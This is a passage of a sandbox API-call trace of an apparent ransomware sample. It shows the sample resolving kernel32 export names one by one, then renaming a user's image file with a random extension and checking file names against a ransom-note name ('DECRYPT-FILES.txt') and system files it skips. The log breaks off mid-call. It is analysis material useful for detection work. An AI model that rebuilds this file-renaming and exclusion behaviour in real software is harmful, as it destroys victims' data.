[0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.582] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.582] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.582] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.582] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.582] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.582] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.582] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.582] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.582] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.582] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.582] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.582] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.582] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.583] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.583] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.583] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.583] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.583] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.583] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.583] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.583] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.583] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.583] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.583] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.583] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.583] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.583] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.583] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.583] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.583] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.583] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.584] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.584] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.584] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.584] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.584] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.584] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.584] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.584] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.584] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.584] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.584] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.584] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.584] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.584] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.584] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.584] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.584] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.585] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.585] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.585] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.585] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.585] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.585] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.585] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.585] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.585] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.585] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.585] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.585] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.585] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.585] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.585] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.585] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.585] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.586] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.586] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.586] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.586] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.586] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.586] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.586] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.586] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.586] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.586] lstrlenA (lpString="DELETEATOM") returned 10 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.586] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.586] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.586] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.586] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.586] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.586] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.586] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.587] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.587] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.587] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.587] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.587] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.587] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.587] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.587] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.587] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.587] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.587] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.587] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.587] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.587] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.587] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.587] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.587] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.587] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.588] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.588] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.588] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.588] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.588] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.588] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.588] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.588] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.588] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.588] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.588] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.588] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.588] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.588] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.588] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.589] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.589] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1ek gB-.png") returned 57 [0076.589] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1ek gB-.png.MBO3vR") returned 64 [0076.589] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1ek gB-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1ek gb-.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1ek gB-.png.MBO3vR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1ek gb-.png.mbo3vr"), dwFlags=0x0) returned 1 [0076.590] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.590] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.590] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.590] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd598d800, ftCreationTime.dwHighDateTime=0x1d4cc2f, ftLastAccessTime.dwLowDateTime=0xd0e5fb00, ftLastAccessTime.dwHighDateTime=0x1d4c8d1, ftLastWriteTime.dwLowDateTime=0xd0e5fb00, ftLastWriteTime.dwHighDateTime=0x1d4c8d1, nFileSizeHigh=0x0, nFileSizeLow=0x3b66, dwReserved0=0x0, dwReserved1=0x0, cFileName="1v9OFDiJWPm8MHHQ.odt", cAlternateFileName="1V9OFD~1.ODT")) returned 1 [0076.590] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt", lpString2="DECRYPT-FILES.txt") returned -1 [0076.590] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt", lpString2="autorun.inf") returned -1 [0076.590] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt", lpString2="boot.ini") returned -1 [0076.590] lstrcmpiW 